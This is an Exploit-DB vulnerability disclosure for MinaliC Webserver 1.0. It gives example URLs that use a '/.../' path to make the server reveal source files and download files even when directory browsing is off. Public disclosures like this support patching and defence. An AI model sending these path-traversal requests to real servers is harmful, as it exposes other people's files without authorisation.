MinaliC Webserver 1.0 - Remote Source Disclosure/File Download

2010-10-27T00:00:00
ID EDB-ID:15336
Type exploitdb
Reporter Dr_IDE
Modified 2010-10-27T00:00:00

Description

MinaliC Webserver 1.0 Remote Source Disclosure/File Download. Remote exploit for windows platform

                                        
                                            ###################################################################
#
# MinaliC Webserver 1.0 Remote Source Disclosure/File Download
# Found By: 	Dr_IDE
# Date:     	October 27, 2010
# Download:	    http://sourceforge.net/projects/minalic/
# Tested on:    Windows 7
# Greets:		edb team & John Leitch for finding the app
#
###################################################################
 
- Description -
 
MinialiC Webserver v1.0 is a Windows based HTTP server. This is the latest
version of the application available.
 
MinialiC Webserver v1.0 is vulnerable to common remote source disclosure attacks.
 
- Technical Details - (This is with Directory browsing = Off)
 
http://[ webserver IP][:port][/.../]index.html    (Source Disclosure)
http://[ webserver IP][:port][/.../]logo.bmp      (File Download)

http://localhost:8080/.../index.html
 
#[pocoftheday.blogspot.com]